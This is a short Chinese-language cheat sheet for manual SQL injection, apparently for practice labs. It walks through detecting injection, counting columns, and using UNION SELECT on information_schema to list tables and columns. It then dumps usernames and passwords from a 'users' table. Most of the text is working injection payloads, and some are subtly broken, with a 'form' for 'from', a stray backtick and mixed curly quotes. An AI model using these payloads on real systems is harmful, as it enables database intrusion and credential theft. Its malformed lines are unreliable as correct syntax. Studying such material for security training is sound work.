手工注入常规思路:

1.判断是否存在注入,注入是字符型还是数字型

2.猜解 SQL 查询语句中的字段数

3.确定显示的字段顺序

4.获取当前数据库

5.获取数据库中的表

6.获取表中的字段名

7.查询到账户的数据

注:1~7为字符型注入,数字型注入要去掉 ' 符号

1.判断是否存在注入,注入是字符型还是数字型

1

1' or '1'='1
1’and ‘1’ =’2
1 or 1=1

2.猜解SQL查询语句中的字段数

1′ or 1=1 order by 1 #
1′ or 1=1 order by 2 #
...

3.确定显示的字段顺序

1′ union select 1,2 #

4.获取当前数据库

1′ union select 1,database() #

5.获取数据库中的表

1′ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()  

6.获取表中的字段名

1′ union select 1,group_concat(column_name) from `information_schema.columns where table_name='users' #

7.下载数据

1′ or 1=1 union select group_concat(user_id,first_name,last_name),group_concat(password) from users #

eg:查看thiskey表中k0y字段(列)信息
1 union select 1,k0y form thiskey


参考 https://www.jianshu.com/p/146784550d0a